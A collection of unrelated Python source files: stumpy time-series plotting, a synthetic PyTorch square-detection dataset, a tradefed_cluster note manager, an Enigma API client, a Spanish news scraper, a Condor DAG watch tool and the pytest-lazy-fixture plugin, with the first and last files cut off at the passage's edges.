ts = motif.get_child("variable").get_target().get_time_series(resampleTimes = times)
dataDiff = ts["values"][0]-data[0]
data = data +dataDiff
return True
def debug_help_vis(distance_profile, minimaRelPeakWD, idxSortDistProfMinimaExc):
numpy.savetxt("profile.txt", distance_profile, delimiter=',')
numpy.savetxt("minRelPeakWD.txt", minimaRelPeakWD, delimiter=',')
numpy.savetxt("idxSotedProfExc.txt", idxSortDistProfMinimaExc, delimiter=',')
return True
def stumpy_print_z_normalized_labeled_2_axis(querySeriesValues, timeSeriesValues, idx, label, varName):
"""
:param querySeries: a subsequence (motif), which is a subsequence of the full time series (like mass)
:param timeSeries: a time series (full time series) (like mass)
:param idx: index - position nearest neightbor to query (result of stumpy_mass function
:param label: string as a name or label for the figure
:param varName: string that represents the name of the variable
:return:
"""
# Since MASS computes z-normalized Euclidean distances,
# we should z-normalize our subsequences before plotting
querylength = querySeriesValues.size
querySeriesValues_z_norm = stp.core.z_norm(querySeriesValues)
timeSeriesValues_z_norm = stp.core.z_norm(timeSeriesValues)
timeSeriesValues = timeSeriesValues
fig, ax1 = plt.subplots()
ax1.set_xlabel('Time', fontsize ='12')
ax1.set_ylabel('Motif / query ', fontsize='12', color = 'blue')
ax1.plot(querySeriesValues_z_norm, lw=2, color="blue", label="Query z-norm")
ax1.tick_params(axis='y', labelcolor='blue')
ax2 = ax1.twinx() ### instantiate a scondary axis that shares the same x-axis
ax2.set_ylabel('TS match (excerpt TS)', fontsize='12', color = 'red')
ax2.plot(timeSeriesValues_z_norm, lw=2, color = "red", label="TS z-norm")
ax2.tick_params(axis='y', labelcolor='red')
fig.tight_layout() # otherwise the right y-label is slightly clipped
plt.legend()
plt.savefig('MASS_4/Z_norm_cross_norm' + varName + '_' + label + '.png')
plt.close(fig)
fig, ax1 = plt.subplots()
ax1.set_xlabel('Time', fontsize='12')
ax1.set_ylabel('Motif / query ', fontsize='12', color='blue')
ax1.plot(querySeriesValues, lw=2, color="blue", label="Query z-norm")
ax1.tick_params(axis='y', labelcolor='blue')
ax2 = ax1.twinx() ### instantiate a scondary axis that shares the same x-axis
ax2.set_ylabel('TS match (excerpt TS)', fontsize='12', color='red')
ax2.plot(timeSeriesValues[idx:idx+querylength], lw=2, color="red", label="TS z-norm")
ax2.tick_params(axis='y', labelcolor='red')
fig.tight_layout() # otherwise the right y-label is slightly clipped
plt.legend()
plt.savefig('MASS_4/ORIG_cross_norm' + varName + '_' + label + '.png')
plt.close(fig)
return True
def stumpy_print_z_normalized_labeled_1_axis(querySeriesValues, timeSeriesValues, timeSeriesTimes, idx, label, varName):
querylength = querySeriesValues.size
querySeriesValues_z_norm = stp.core.z_norm(querySeriesValues)
timeSeriesValues_z_norm = stp.core.z_norm(timeSeriesValues)
timeSeriesValues = timeSeriesValues
fig = plt.figure()
plt.suptitle('Comparing The Query To Its Nearest Neighbor', fontsize='11')
plt.xlabel('Time', fontsize ='11')
plt.ylabel('Motif Variable', fontsize='11')
plt.plot(timeSeriesValues_z_norm, lw=2, color = "red", label="Nearest Neighbor")
plt.plot(querySeriesValues_z_norm, lw=2, color="blue", label="Query , querySeries")
plt.legend()
plt.savefig('MASS_4/1_Axis_Z_norm_cross_norm' + varName + '_' + label + '.png')
plt.close(fig)
return True
|
<reponame>deep-cube/deep-cube
import torch
import os
import numpy as np
from tqdm import tqdm
from pprint import pprint
from data_utils import array_to_video_view
class SingleSquareActivatedDataset(torch.utils.data.Dataset):
def __init__(
self,
L, C, H, W,
square_persistence_length=1,
use_background_noise=False,
dataset_length=100
):
"""
a dataset that generates dummy training data to test a conv+recurrent model
by populating frames of data with a black background / noise background
then a fixed number of frames with a stationary white square of size exactly
a quarter of the frame, in a random position, the frames with the squares in
them depend on the label.
intuitively, a model should be able to learn this simple pattern of "observing
n consecutive white square should produce a prediction of 1, otherwise 0"
Args:
- torch ([type]): [description]
- L (int): length of each clip
- C (int): num channel
- H (int): height of frame
- W (int): width of frame
- square_persistence_length (int, optional): number of white squares before
a prediction of 1. Defaults to 1.
- use_background_noise (bool, optional): if true, background is random noise
pixles, if false, background is black. Defaults to False.
- dataset_length (int, optional): number of clips in the dataset. Defaults to 100.
"""
self.C, self.H, self.W, self.L = C, H, W, L
self.square_size = min(H, W) // 2
self.use_background_noise = use_background_noise
self.dataset_length = dataset_length
self.square_persistence_length = square_persistence_length
self.random_state = None
def __len__(self):
return self.dataset_length
def __getitem__(self, idx):
if self.random_state is None:
self.random_state = np.random.RandomState()
y = self.random_state.choice(
2,
size=(self.L,),
p=[0.9, 0.1]
)
for l in range(self.L-1):
if y[l-self.square_persistence_length:l].sum() > 0:
y[l] = 0
if self.use_background_noise:
x = self.random_state.choice(
256, size=(self.L, self.C, self.H, self.W))
else:
x = np.zeros((self.L, self.C, self.H, self.W))
for l in range(self.L):
if l < self.square_persistence_length:
continue
if y[l] == 1:
up = self.random_state.choice(self.H - self.square_size)
down = up + self.square_size
left = self.random_state.choice(self.W - self.square_size)
right = left + self.square_size
x[
l+1-self.square_persistence_length: l+1,
:, up:down, left:right
] = 255 - self.random_state.choice(20)
return x, y, len(y)
class SingleSquareActivatedMultiClassCTCDataset(torch.utils.data.Dataset):
def __init__(
self,
L, C, H, W,
square_persistence_length=1,
use_background_noise=False,
dataset_length=100
):
"""
a dataset that generates dummy training data to test a conv+recurrent model
by populating frames of data with a black background / noise background
then a fixed number of frames with a stationary white square of size exactly
a quarter of the frame, in a random position, the frames with the squares in
them depend on the label.
intuitively, a model should be able to learn this simple pattern of "observing
n consecutive white square should produce a prediction of 1, otherwise 0"
Args:
- torch ([type]): [description]
- L (int): length of each clip
- C (int): num channel
- H (int): height of frame
- W (int): width of frame
- square_persistence_length (int, optional): number of white squares before
a prediction of 1. Defaults to 1.
- use_background_noise (bool, optional): if true, background is random noise
pixles, if false, background is black. Defaults to False.
- dataset_length (int, optional): number of clips in the dataset. Defaults to 100.
"""
self.C, self.H, self.W, self.L = C, H, W, L
self.square_size = min(H, W) // 2
self.use_background_noise = use_background_noise
self.dataset_length = dataset_length
self.square_persistence_length = square_persistence_length
self.random_state = None
def __len__(self):
return self.dataset_length
def __getitem__(self, idx):
if self.random_state is None:
self.random_state = np.random.RandomState()
y = self.random_state.choice(
2,
size=(self.L,),
p=[0.9, 0.1]
)
collapsed_y = []
for l in range(self.L-1):
if y[l-self.square_persistence_length:l].sum() > 0:
y[l] = 0
if self.use_background_noise:
x = self.random_state.choice(
256, size=(self.L, self.C, self.H, self.W))
else:
x = np.zeros((self.L, self.C, self.H, self.W))
for l in range(self.L):
if l < self.square_persistence_length:
continue
if y[l] == 1:
up = self.random_state.choice(self.H - self.square_size)
down = up + self.square_size
left = self.random_state.choice(self.W - self.square_size)
right = left + self.square_size
x[
l+1-self.square_persistence_length: l+1,
:, up:down, left:right
] = 0
channel_to_activate = self.random_state.choice(self.C)
x[
l+1-self.square_persistence_length: l+1,
channel_to_activate, up:down, left:right
] = 255
collapsed_y.append(channel_to_activate + 1)
l = len(collapsed_y)
collapsed_y = np.pad(
np.array(collapsed_y, dtype=np.uint8), ((0, self.L - l)))
return x, collapsed_y, l
if __name__ == "__main__":
ds = SingleSquareActivatedMultiClassCTCDataset(
30, 100, 100,
square_persistence_length=1,
use_background_noise=True,
)
x, y = ds[0]
print(y)
print(x.shape, y.shape)
array_to_video_view(x)
# ds = SingleSquareActivatedDataset(50, 1, 10, 10)
# loader = torch.utils.data.DataLoader(
# ds, batch_size=10, num_workers=1
# )
# for i, data in enumerate(tqdm(loader)):
# x, y = data
# print(x.shape, y.shape)
# ds = SingleSquareActivatedDataset(
# 50, 3, 100, 100,
# square_persistence_length=3,
# use_background_noise=True,
# )
# x, y = ds[0]
# print(y)
# print(x.shape, y.shape)
# array_to_video_view(x, y)
|
<filename>tradefed_cluster/note_manager.py<gh_stars>0
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A module for note management."""
import datetime
import logging
import lazy_object_proxy
from protorpc import protojson
from tradefed_cluster.util import ndb_shim as ndb
from tradefed_cluster import common
from tradefed_cluster import datastore_entities
from tradefed_cluster import env_config
from tradefed_cluster.util import pubsub_client
DEVICE_NOTE_PUBSUB_TOPIC = "projects/%s/topics/%s" % (env_config.CONFIG.app_id,
"device_note")
HOST_NOTE_PUBSUB_TOPIC = "projects/%s/topics/%s" % (env_config.CONFIG.app_id,
"host_note")
class InvalidParameterError(ValueError):
"""The error of invalid function parameter."""
def GetPredefinedMessage(message_type, lab_name, content):
"""Get PredefinedMessage from datastore that matches the fields.
Args:
message_type: enum, common.PredefinedMessageType, type of PredefinedMessage.
lab_name: str, the lab where the message is created.
content: str, content of the message.
Returns:
A datastore_entities.PredefinedMessage, or None if not found.
"""
predefined_message_entities = (
datastore_entities.PredefinedMessage.query()
.filter(datastore_entities.PredefinedMessage.type == message_type).filter(
datastore_entities.PredefinedMessage.lab_name == lab_name).filter(
datastore_entities.PredefinedMessage.content == content).fetch(1))
if predefined_message_entities:
return predefined_message_entities[0]
else:
return None
def GetOrCreatePredefinedMessage(message_type, lab_name, content):
"""Get PredefinedMessage datastore entity or create it if not existing.
Args:
message_type: enum, common.PredefinedMessageType, type of PredefinedMessage.
lab_name: str, the lab where the message is created.
content: str, content of the message.
Returns:
An instance of datastore_entities.PredefinedMessage.
"""
exisiting_predefined_message_entity = GetPredefinedMessage(
message_type=message_type, lab_name=lab_name, content=content)
if exisiting_predefined_message_entity:
return exisiting_predefined_message_entity
else:
return datastore_entities.PredefinedMessage(
type=message_type,
content=content,
lab_name=lab_name,
create_timestamp=datetime.datetime.utcnow())
def PreparePredefinedMessageForNote(
message_type, message_id=None, lab_name=None, content=None, delta_count=1):
"""Prepare a PredefinedMessage to attach to a Note.
This method prepares a PredefinedMessage in following ways:
- if message_id is provided, find the message with id, or
- if content is provide, get existing message matching the content, or create
new message with the content
- if neither is provided, return None
Args:
message_type: enum, common.PredefinedMessageType, type of PredefinedMessage.
message_id: int, the ID of PredefinedMessage.
lab_name: str, the lab where the message is created.
content: str, content of the message.
delta_count: the delta used_count to be added.
Returns:
An instance of datastore_entities.PredefinedMessage.
Raises:
InvalidParameterError: when the message_id is not valid or it leads to an
wrong PredefineMessage type.
"""
predefined_message_entity = None
if message_id:
predefined_message_entity = ndb.Key(
datastore_entities.PredefinedMessage, message_id).get()
if (not predefined_message_entity
or predefined_message_entity.type != message_type):
raise InvalidParameterError(
"Invalid predefined_message_id: %s" % message_id)
elif content:
predefined_message_entity = GetOrCreatePredefinedMessage(
message_type, lab_name, content)
if predefined_message_entity:
predefined_message_entity.used_count += delta_count
return predefined_message_entity
def _Now():
"""Returns the current time in UTC. Added to allow mocking in our tests."""
return datetime.datetime.utcnow()
def _CreatePubsubClient():
"""Create a client for Google Cloud Pub/Sub."""
client = pubsub_client.PubSubClient()
client.CreateTopic(DEVICE_NOTE_PUBSUB_TOPIC)
client.CreateTopic(HOST_NOTE_PUBSUB_TOPIC)
return client
_PubsubClient = lazy_object_proxy.Proxy(_CreatePubsubClient)
def PublishMessage(device_note_message, event_type):
"""Publish device note event message to pubsub."""
if not env_config.CONFIG.use_google_api:
logging.warning(
"Unabled to send device note message to pubsub: use_google_api=False"
)
return
device_note_message.publish_timestamp = _Now()
encoded_message = protojson.encode_message(device_note_message) # pytype: disable=module-attr
data = common.UrlSafeB64Encode(encoded_message)
if event_type == common.PublishEventType.DEVICE_NOTE_EVENT:
data_type = "deviceNote"
topic = DEVICE_NOTE_PUBSUB_TOPIC
else:
data_type = "hostNote"
topic = HOST_NOTE_PUBSUB_TOPIC
_PubsubClient.PublishMessages(topic, [{
"data": data,
"attributes": {
"type": data_type,
}
}])
|
from datetime import date, datetime
import decimal
import requests
import warnings
API_ENDPOINT = 'https://api.enigma.io'
API_VERSION = 'v2'
# Data type mappings are based on PL/Python PostgreSQL to Python mappings
# http://www.postgresql.org/docs/9.4/static/plpython-data.html
_data_type_codec = {
'bigint': long,
'boolean': bool,
'bytea': str,
'character varying': str,
'date': date,
'double': float,
'double precision': float,
'int': int,
'integer': int,
'numeric': decimal.Decimal,
'oid': long,
'real': float,
'smallint': int,
'text': str,
'timestamp without time zone': datetime,
'timestamp': datetime,
'varcahr': str
}
def _map_metadata_data_type(metadata_columns):
'''Return the column data from the MetaData endpoint with corresponding
Python data types included. Even though this is used in only one place, it
has been separated out to facilitate testing.
'''
for column in metadata_columns:
# Data types returned by the MetaData endpoint are prefixed with type_
column['python_type'] = _data_type_codec.get(
' '.join(column['type'].split('_')[1:]), str)
return metadata_columns
class EnigmaAPI(object):
'''The EnigmaAPI provides access to the five different endpoints of the
Enigma API: meta, data, stats, export, and limits.
ARGUMENTS
---------
client_key : a string corresponding to a valid API key
EXAMPLE
-------
>>> from pynigma import client
>>> import os
>>> ENIGMA_API_KEY = os.environ['ENIGMA_API_KEY']
>>> api = client.EnigmaAPI(ENIGMA_API_KEY)
>>> api
<EnigmaAPI(endpoint=https://api.enigma.io, version=v2)>
'''
_param_mapping = {
'meta': ['page'],
'data': ['limit', 'select', 'search',
'where', 'conjunction', 'sort', 'page'],
'stats': ['select', 'operation', 'by', 'of', 'limit',
'search', 'where', 'conjunction', 'sort', 'page'],
'export': ['select', 'search', 'where', 'conjunction', 'sort'],
'limits': []
}
def __init__(self, client_key):
self.client_key = client_key
self._endpoint = API_ENDPOINT
self._version = API_VERSION
self.request_url = None
def __repr__(self):
return '<EnigmaAPI(endpoint={endpoint}, version={version})>'.format(
endpoint=self._endpoint, version=self._version)
def _check_query_params(self, resource, **kwargs):
invalid_params = set(
kwargs.keys()) - set(self._param_mapping[resource])
if invalid_params:
raise ValueError(
'Invalid parameters for the {0} endpoint passed: {1}'.format(
resource, invalid_params))
return True
def _url_for_datapath(self, resource, datapath, **kwargs):
if self._check_query_params(resource=resource, **kwargs):
base_url = '/'.join(
[self._endpoint, self._version, resource, self.client_key])
# There is no datapath associated with the limits endpoint.
if datapath:
params = ['='.join([k, v]) for k, v in kwargs.iteritems()]
return '/'.join([base_url, datapath, '?' + '&'.join(params)])
return base_url
def _request(self, resource, datapath, **kwargs):
self.request_url = self._url_for_datapath(
resource, datapath, **kwargs)
try:
res = requests.get(self.request_url)
except res.status_code != 200:
warnings.warn('Request returned with status code: {0}.'.format(
res.status_code))
finally:
return res.json()
def get_data(self, datapath, **kwargs):
'''Returns an HTTP response from the data endpoint as decoded JSON.
ARGUMENTS
---------
datapath : a string corresponding to the dataset requested
**kwargs : a dictionary of keyword arguments corresponding
to the provided query parameters and values
EXAMPLE
-------
>>> data = api.get_data(datapath='us.gov.whitehouse.salaries.2011')
>>> data['result'][0] # the first salary in the dataset
{u'status': u'Employee', u'salary': u'70000.00',
u'name': u'Abrams, <NAME>. ', u'pay_basis': u'Per Annum',
u'position_title': u'REGIONAL COMMUNICATIONS DIRECTOR', u'serialid': 1}
'''
return self._request(resource='data', datapath=datapath, **kwargs)
def get_metadata(self, datapath, **kwargs):
'''Returns an HTTP response from the metadata endpoint as decoded JSON.
The column metadata will include an additional key, 'python_type',
representing the corresponding Python data type. If the Python data
type can't be determined, it will default to str.
ARGUMENTS
---------
datapath : a string corresponding to the dataset requested
**kwargs : a dictionary of keyword arguments corresponding
to the provided query parameters and values
EXAMPLE
-------
>>> metadata = api.get_metadata(
datapath='us.gov.whitehouse.visitor-list')
>>> for column in metadata['result']['columns'][:5]:
... print column['label']
Last Name
First Name
Middle Initial
Full Name
Appointment Number
'''
metadata_res = self._request(
resource='meta', datapath=datapath, **kwargs)
metadata_res['result']['columns'] = _map_metadata_data_type(
metadata_res['result']['columns'])
return metadata_res
def get_stats(self, datapath, **kwargs):
'''Returns an HTTP response from the stats endpoint as decoded JSON.
ARGUMENTS
---------
datapath : a string corresponding to the dataset requested
**kwargs : a dictionary of keyword arguments corresponding
to the provided query parameters and values
EXAMPLE
-------
>>> stats = api.get_stats(datapath='us.gov.whitehouse.visitor-list',
**{'select': 'type_of_access'})
>>> for type in stats['result']['frequency']:
... print type['type_of_access'], type['count']
VA 4368369
AL 32278
PE 12
WO 8
None 0
'''
return self._request(resource='stats', datapath=datapath, **kwargs)
def get_export(self, datapath, **kwargs):
'''Returns an HTTP response from the export endpoint as decoded JSON.
ARGUMENTS
---------
datapath : a string corresponding to the dataset requested
**kwargs : a dictionary of keyword arguments corresponding
to the provided query parameters and values
EXAMPLE
-------
>>> export = api.get_export(datapath='us.gov.whitehouse.visitor-list')
>>> print export['head_url']
https://enigma-api-export...
'''
return self._request(resource='export', datapath=datapath, **kwargs)
def get_limits(self, resource='limits'):
'''Returns an HTTP response from the limits endpoint as decoded JSON.
EXAMPLE
-------
>>> api.get_limits()
{u'seconds_remaining': 1305446, u'stats': 9999, u'period': u'monthly',
u'meta': 9996, u'export': 48, u'data': 9891}
'''
return self._request(resource='limits', datapath=None)
|
import requests
import json
from bs4 import BeautifulSoup
from src.scripts.scrapper.resources.css_attributes import *
from src.utils import log
from src.utils import io
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.106 Safari/537.36'
}
TYPE_TWO = [ELPLURAL]
TYPE_THREE = [HAYNOTICIAS]
TYPE_FOUR = [ELINFOBAE, PUBLICO]
def get_title(soup, attr):
# Get title
if 'attr' in attr['title']:
title_soup = soup.find(attr['title']['name'], attr['title']['attr'])
else:
title_soup = soup.find(attr['title']['name'])
title = title_soup.text
return title.replace("\n", "")
def get_subtitle(soup, attr):
# Get subtitle
if 'subtitle' not in attr:
return -1
if 'attr' in attr['subtitle']:
subtitle_soup = soup.find(
attr['subtitle']['name'], attr['subtitle']['attr'])
else:
subtitle_soup = soup.find(attr['subtitle']['name'])
if subtitle_soup != None:
subtitle = subtitle_soup.text
return subtitle.replace("\n", "")
else:
return ''
def get_body(soup, attr):
if 'attr' in attr['text']:
body_soup = soup.find(attr['text']['name'], attr['text']['attr'])
else:
body_soup = soup.find(attr['text']['name'])
paragraph_list = []
for paragraph_soup in body_soup.find_all('p', recursive=False):
text_aux = paragraph_soup.text
if text_aux:
text_aux = text_aux.replace("\n", "")
if len(text_aux) > 2: # Check if is empty
paragraph_list.append(text_aux)
return paragraph_list
def get_body_type_two(soup,attr):
body_soup = soup.find(attr['text']['name'], attr['text']['attr'])
paragraph_list = str(body_soup).split('<br/>')
result = []
for p in paragraph_list:
clean_p = BeautifulSoup(p)
if len(clean_p.text) > 2:
result.append(clean_p.text)
return result
def get_body_type_three(soup,attr):
body_soup = soup.find(attr['text']['name'], attr['text']['attr'])
paragraph_list = []
# Especial first paragraph (optional)
first_p = body_soup.find('p')
if first_p != None and len(first_p.text) > 2:
paragraph_list.append(first_p.text)
# The others ...
first_child = body_soup.find('div')
for paragraph_soup in first_child.find_all('p', recursive=False):
text_aux = paragraph_soup.text
if text_aux:
text_aux = text_aux.replace("\n", "")
if len(text_aux) > 2: # Check if is empty
paragraph_list.append(text_aux)
return paragraph_list
def get_body_type_four(soup,attr):
body_soup = soup.find_all(attr['text']['name'], attr['text']['attr'])
paragraph_list = []
for paragraph_soup in body_soup:
text_aux = paragraph_soup.text
if text_aux:
text_aux = text_aux.replace("\n", "")
if len(text_aux) > 2: # Check if is empty
paragraph_list.append(text_aux)
return paragraph_list
def make_request(url, attr):
response = requests.get(url, headers=headers)
result = {}
if response.status_code == 200:
data = response.text
soup = BeautifulSoup(data, 'html.parser')
# Title
result['title'] = get_title(soup, attr)
# Subtitle
subtitle = get_subtitle(soup, attr)
if subtitle != -1:
result['subtitle'] = subtitle
else:
result['subtitle'] = ''
# Text
if attr in TYPE_TWO:
result['text'] = get_body_type_two(soup, attr)
elif attr in TYPE_THREE:
result['text'] = get_body_type_three(soup, attr)
elif attr in TYPE_FOUR:
result['text'] = get_body_type_four(soup, attr)
else:
result['text'] = get_body(soup, attr)
# URL
result['url'] = url
return result
def get_variable(var):
switcher = {
'abc.com': ABC,
'lavanguardia.com': LA_VANGUARDIA,
'marca.com': MARCA,
'esdiario.com': ESDIARIO,
'mediterraneodigital.com': MEDITERRANEO,
'alertadigital.com': ALERTADIGITAL,
'cataladigital.com': CATALADIGITAL,
'europapress.com': EUROPAPRESS,
'gomeraactualidad.com': GOMERAACTUALIDAD,
'periodistadigital.com': PERIODISTADIGITAL,
'elplural.com': ELPLURAL,
'antena3.com': ANTENA3,
'lasexta.com': LASEXTA,
'elperiodico.com': ELPERIODICO,
'elmundo.es': ELMUNDO,
'20minutos.com': XXMINUTOS,
'elpais.com': ELPAIS,
'gaceta.es': LAGACETA,
# 'elespanol.com': ELESPANOL
'haynoticias.es' : HAYNOTICIAS,
'ecoportal.net': ECOPORTAL,
'europafm.com': EUROPAFM,
'elconfidencialdigital.com': ELCONFIDENCIAL,
'elinfobae.com': ELINFOBAE,
'eleconomista.es': ELECONOMISTA,
'ultimahora.com': ULTIMAHORA,
'cadenaser.com': CADENASER,
'publico.es': PUBLICO,
'que.es': QUE,
'fcinco.com': FCINCO
}
return switcher.get(var, -1)
def get_all_news(path, is_fake, n):
url_list = io.read_json_file(path)
for key in url_list.keys():
css_attr = get_variable(key)
if css_attr != -1:
for item in url_list[key]:
n += 1
try:
print('Making request of ...', item)
result = make_request(item, css_attr)
result['fake'] = is_fake
out_path = 'src/data/articles/Article_' + str(n) + '.json'
io.write_json_file(out_path, result)
print('File saved!')
except ValueError as err:
print(err)
print('Problem with: ', item)
return n
def run(n):
path = 'src/data/list_url_2.json'
n = get_all_news(path, False, n)
print(n)
if __name__ == '__main__':
# From
n = 63
run(n)
|
<filename>conwatch/WatchCmd.py<gh_stars>0
#!/usr/bin/env python
import time
import sys
import subprocess
import sqlite3
from ConWatchConfig import *
# DAG information
cmd = ""
cmdargs = []
# DB information
conn = None
c = None
def listDAGs(cmdargs):
# Specify the condor_q command to run
condorcmd = ['condor_q', '-format', '\n%d ', 'ClusterId', \
'-format', '%s ', 'Cmd', \
'-format', '%s ', 'Iwd', \
'-format', '%d', 'DAGManJobId']
# Under high scheduler load, will get failure to connect error. In this case
# retry the query
count = 0
done = False
while ((count < CONDOR_RETRY) and (not done)):
print "Querying condor_q for DAGS"
p = subprocess.Popen(condorcmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
joblist = p.communicate()[0]
retcode = p.returncode
if retcode != 0:
print "condor_q failure, retcode=" + str(retcode)
count = count + 1
print "Waiting " + CONDOR_WAIT + " secs, then retrying"
time.sleep(CONDOR_WAIT)
else:
done = True
if (not done):
joblist = []
else:
joblist = joblist.splitlines()
print "Top-level DAGs running in Condor:"
found = 0
for j in joblist:
tokens = j.split()
if ((len(tokens) == 3) and (tokens[1].find(CONDOR_DAGMAN) != -1)):
print tokens[0], tokens[2]
found = found + 1
if (found == 0):
print "None found."
return 0
def listWatchList(cmdargs):
try:
c.execute("select * from dags where not status = ?", (STATUS_DONE,))
daglist = c.fetchall()
print "DAGs in Watch List:"
if (len(daglist) == 0):
print "No DAGs in watch list"
else:
for row in daglist:
print row
except:
print sys.exc_info()
return 1
return 0
def showErrors(cmdargs):
# Trim the .# if the user specified it
jobid = cmdargs[0].split(".")[0]
notify = cmdargs[1]
try:
print "Finding DAGs for jobid " + jobid + ":" + notify
c.execute("select dagid from dags where jobid = ? and notify_user = ?", (jobid, notify,))
daglist = c.fetchall()
if (len(daglist) == 0):
print "No DAGs found for jobid " + jobid + ":" + notify
return 1
else:
# dagid is first field
for dag in daglist:
dagid = dag[0]
print "Errors for dagid " + str(dagid) + " (" + jobid + ":" + notify + ")"
print "--------------------------------------------------------------"
c.execute('select * from jobs where dagid = ?', (dagid,))
errorlist = c.fetchall()
for error in errorlist:
print error
if (len(errorlist) == 0):
print "No errors found"
except:
print "Unable to list errors for DAG " + jobid + ":" + notify
print sys.exc_info()
return 1
# Save (commit) the changes
conn.commit()
return 0
def removeDAG(cmdargs):
# Trim the .# if the user specified it
jobid = cmdargs[0].split(".")[0]
notify = cmdargs[1]
try:
print "Finding all DAGs for jobid " + jobid + ":" + notify
c.execute("select dagid from dags where jobid = ? and notify_user = ?", (jobid, notify,))
daglist = c.fetchall()
if (len(daglist) == 0):
print "No DAGs found for jobid " + jobid + ":" + notify
return 1
else:
print "Removing all DAGs with jobid " + jobid + ":" + notify
# Note that there might be multiple rows since a job may have been submitted
# to Condor Watch more than once (in the case of a rescue DAG)
for dag in daglist:
# dagid is first field.
dagid = dag[0]
print "Deleting entries for dagid " + str(dagid)
c.execute('delete from jobs where dagid = ?', (dagid,))
c.execute('delete from dags where dagid = ?', (dagid,))
except:
print "Unable to remove DAGs for jobid " + jobid + ":" + notify
print sys.exc_info()
return 1
# Save (commit) the changes
conn.commit()
return 0
# Constants
VALID_COMMANDS = {"-condordags":listDAGs, \
"-watchlist":listWatchList, \
"-errors":showErrors, \
"-removedag":removeDAG}
def init():
global conn
global c
global cmd
global cmdargs
# Get number of command-line arguments
argc = len(sys.argv)
# Check command line arguments
if (argc < 2):
print "Usage: " + sys.argv[0] + " <-command> [command arguments]"
print "Supported commands:"
print "\t-condordags"
print "\t-watchlist"
print "\t-errors <dagid> <user>"
print "\t-removedag <dagid> <user>"
return 1
# Parse command-line options
cmd = sys.argv[1]
if (argc >= 2):
cmdargs = sys.argv[2: argc]
else:
cmdargs = []
validcmds = VALID_COMMANDS.keys()
if (not cmd in validcmds):
print "Invalid command specified"
return 1
print "Command: " + cmd
print "Command Args: " + str(cmdargs)
if ((cmd == "-errors")or (cmd == "-removedag")):
if (len(cmdargs) != 2):
print "Jobid and user must be specified"
return 1
# Create DB connection
try:
conn = sqlite3.connect(DB_FILE)
except:
print sys.exc_info()
return 1
# Create cursor
c = conn.cursor()
return 0
def main():
# Use the dictionary to lookup the proper function given the command
f = VALID_COMMANDS[cmd]
f(cmdargs)
return 0
def cleanup():
# Close connection
if (c != None):
c.close()
return 0
if __name__ == '__main__':
if (init() != 0):
sys.exit(1)
main()
cleanup()
sys.exit(0)
|
# -*- coding: utf-8 -*-
import copy
import sys
import types
from collections import defaultdict
import pytest
PY3 = sys.version_info[0] == 3
string_type = str if PY3 else basestring
def pytest_configure():
pytest.lazy_fixture = lazy_fixture
@pytest.hookimpl(tryfirst=True)
def pytest_runtest_setup(item):
if hasattr(item, '_request'):
item._request._fillfixtures = types.MethodType(
fillfixtures(item._request._fillfixtures), item._request
)
def fillfixtures(_fillfixtures):
def fill(request):
item = request._pyfuncitem
fixturenames = item.fixturenames
autousenames = item.session._fixturemanager._getautousenames(item.nodeid)
for fname in fixturenames:
if fname not in item.funcargs and fname in autousenames:
item.funcargs[fname] = request.getfixturevalue(fname)
if hasattr(item, 'callspec'):
for param, val in sorted_by_dependency(item.callspec.params, fixturenames):
if is_lazy_fixture(val):
item.callspec.params[param] = request.getfixturevalue(val.name)
_fillfixtures()
return fill
@pytest.hookimpl(tryfirst=True)
def pytest_fixture_setup(fixturedef, request):
val = getattr(request, 'param', None)
if is_lazy_fixture(val):
request.param = request.getfixturevalue(val.name)
def pytest_runtest_call(item):
if hasattr(item, 'funcargs'):
for arg, val in item.funcargs.items():
if is_lazy_fixture(val):
item.funcargs[arg] = item._request.getfixturevalue(val.name)
@pytest.hookimpl(hookwrapper=True)
def pytest_pycollect_makeitem(collector, name, obj):
global current_node
current_node = collector
yield
current_node = None
@pytest.hookimpl(hookwrapper=True)
def pytest_generate_tests(metafunc):
yield
normalize_metafunc_calls(metafunc, 'funcargs')
normalize_metafunc_calls(metafunc, 'params')
def normalize_metafunc_calls(metafunc, valtype, used_keys=None):
newcalls = []
for callspec in metafunc._calls:
calls = normalize_call(callspec, metafunc, valtype, used_keys)
newcalls.extend(calls)
metafunc._calls = newcalls
def copy_metafunc(metafunc):
copied = copy.copy(metafunc)
copied.fixturenames = copy.copy(metafunc.fixturenames)
copied._calls = []
copied._ids = copy.copy(metafunc._ids)
copied._arg2fixturedefs = copy.copy(metafunc._arg2fixturedefs)
return copied
def normalize_call(callspec, metafunc, valtype, used_keys):
fm = metafunc.config.pluginmanager.get_plugin('funcmanage')
used_keys = used_keys or set()
valtype_keys = set(getattr(callspec, valtype).keys()) - used_keys
for arg in valtype_keys:
val = getattr(callspec, valtype)[arg]
if is_lazy_fixture(val):
try:
_, fixturenames_closure, arg2fixturedefs = fm.getfixtureclosure([val.name], metafunc.definition.parent)
except ValueError:
# 3.6.0 <= pytest < 3.7.0; `FixtureManager.getfixtureclosure` returns 2 values
fixturenames_closure, arg2fixturedefs = fm.getfixtureclosure([val.name], metafunc.definition.parent)
except AttributeError:
# pytest < 3.6.0; `Metafunc` has no `definition` attribute
fixturenames_closure, arg2fixturedefs = fm.getfixtureclosure([val.name], current_node)
extra_fixturenames = [fname for fname in fixturenames_closure
if fname not in callspec.params and fname not in callspec.funcargs]
newmetafunc = copy_metafunc(metafunc)
newmetafunc.fixturenames = extra_fixturenames
newmetafunc._arg2fixturedefs.update(arg2fixturedefs)
newmetafunc._calls = [callspec]
fm.pytest_generate_tests(newmetafunc)
normalize_metafunc_calls(newmetafunc, valtype, used_keys | set([arg]))
return newmetafunc._calls
used_keys.add(arg)
return [callspec]
def sorted_by_dependency(params, fixturenames):
free_fm = []
non_free_fm = defaultdict(list)
for key in _sorted_argnames(params, fixturenames):
val = params[key]
if not is_lazy_fixture(val) or val.name not in params:
free_fm.append(key)
else:
non_free_fm[val.name].append(key)
non_free_fm_list = []
for free_key in free_fm:
non_free_fm_list.extend(
_tree_to_list(non_free_fm, free_key)
)
